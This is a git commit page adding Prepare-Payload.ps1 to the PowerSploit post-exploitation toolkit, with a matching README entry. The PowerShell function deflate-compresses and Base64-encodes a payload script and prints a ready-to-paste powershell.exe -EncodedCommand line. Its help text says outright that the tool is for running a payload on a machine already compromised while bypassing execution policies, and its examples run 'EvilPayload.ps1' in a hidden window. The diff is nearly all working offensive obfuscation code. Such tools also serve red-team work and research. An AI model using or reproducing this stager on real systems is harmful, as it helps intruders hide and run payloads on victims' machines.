Adding Prepare-Payload

Prepare-Payload compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. This script was inspired by and an improvement upon createcmd.ps1 (https://www.trustedsec.com/files/PowerShell_PoC.zip)
2012-11-22 09:30:14 -05:00 · 2012-11-22 09:30:14 -05:00 · 7710c99e66
parent 138bd39911
commit 7710c99e66
2 changed files with 134 additions and 0 deletions
--- a/Prepare-Payload.ps1
+++ b/Prepare-Payload.ps1
@ -0,0 +1,130 @@
+function Prepare-Payload
+{
+<#
+.SYNOPSIS
+
+Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
+
+PowerSploit Module - Prepare-Payload
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+ 
+.DESCRIPTION
+
+Prepare-Payload prepares a PowerShell script such that it can be pasted into a command prompt. The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.
+
+.PARAMETER ScriptBlock
+
+Specifies a scriptblock containing your payload.
+
+.PARAMETER Path
+
+Specifies the path to your payload.
+
+.PARAMETER NoExit
+
+Outputs the option to not exit after running startup commands.
+
+.PARAMETER NoProfile
+
+Outputs the option to not load the Windows PowerShell profile.
+
+.PARAMETER NonInteractive
+
+Outputs the option to not present an interactive prompt to the user.
+
+.PARAMETER WindowStyle
+
+Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden.
+
+.EXAMPLE
+
+C:\PS> Prepare-Payload -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden
+
+powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=
+
+Description
+-----------
+Execute the above payload for the lulz. >D
+
+.EXAMPLE
+
+C:\PS> Prepare-Payload -ScriptBlock {Write-Host 'hello, world!'}
+
+powershell.exe  -EncodedCommand cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAQwB5AC8ASwBMAEUAbgBWADkAYwBnAHYATABsAEYAUQB6ADAAagBOAHkAYwBuAFgAVQBTAGoAUABMADgAcABKAFUAVgBRAEgAQQBBAD0APQAnACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkA
+
+.NOTES
+
+This cmdlet was inspired by createcmd.ps1 script presented at Dave Kennedy and Josh Kelley's talk - "PowerShell...OMFG" (https://www.trustedsec.com/files/PowerShell_PoC.zip)
+
+.LINK
+
+http://www.exploit-monday.com
+#>
+
+    [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param (
+        [Parameter(Position = 1, ParameterSetName = 'ScriptBlock' )]
+        [ValidateNotNullOrEmpty()]
+        [ScriptBlock]
+        $ScriptBlock,
+
+        [Parameter(Position = 1, ParameterSetName = 'FilePath' )]
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $Path,
+
+        [Switch]
+        $NoExit,
+
+        [Switch]
+        $NoProfile,
+
+        [Switch]
+        $NonInteractive,
+
+        [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')]
+        [String]
+        $WindowStyle
+    )
+
+    if ($PSBoundParameters['Path'])
+    {
+        $Text = Get-Content -Path $Path -Encoding Ascii -ErrorAction Stop
+        $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($Text)
+    }
+    else
+    {
+        $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($ScriptBlock)
+    }
+
+    $CompressedStream = New-Object IO.MemoryStream
+    $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
+    $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
+    $DeflateStream.Dispose()
+    $CompressedScriptBytes = $CompressedStream.ToArray()
+    $CompressedStream.Dispose()
+    $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
+
+    # Generate the code that will decompress and execute the payload.
+    # This code is intentionally ugly to save space.
+    $NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
+
+    # Base-64 strings passed to -EncodedCommand must be unicode encoded.
+    $UnicodeEncoder = New-Object System.Text.UnicodeEncoding
+    $EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))
+
+    # Build the command line options
+    $CommandlineOptions = New-Object String[](0)
+    if ($PSBoundParameters['NoExit'])
+    { $CommandlineOptions += '-NoExit' }
+    if ($PSBoundParameters['NoProfile'])
+    { $CommandlineOptions += '-NoProfile' }
+    if ($PSBoundParameters['NonInteractive'])
+    { $CommandlineOptions += '-NonInteractive' }
+    if ($PSBoundParameters['WindowStyle'])
+    { $CommandlineOptions += "-WindowStyle $($PSBoundParameters['WindowStyle'])" }
+
+    $CommandLineOutput = "powershell.exe $($CommandlineOptions -join ' ') -EncodedCommand $EncodedPayloadScript"
+
+    Write-Output $CommandLineOutput
+}
--- a/4
+++ b/4
@ -4,6 +4,10 @@ PowerSploit is a series of Microsoft PowerShell scripts that can be used in post
 Root Directory
 --------------

+Prepare-Payload:
+
+   Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
+
 Inject-Dll:

   Inject-Dll injects a Dll into the process ID of your choosing.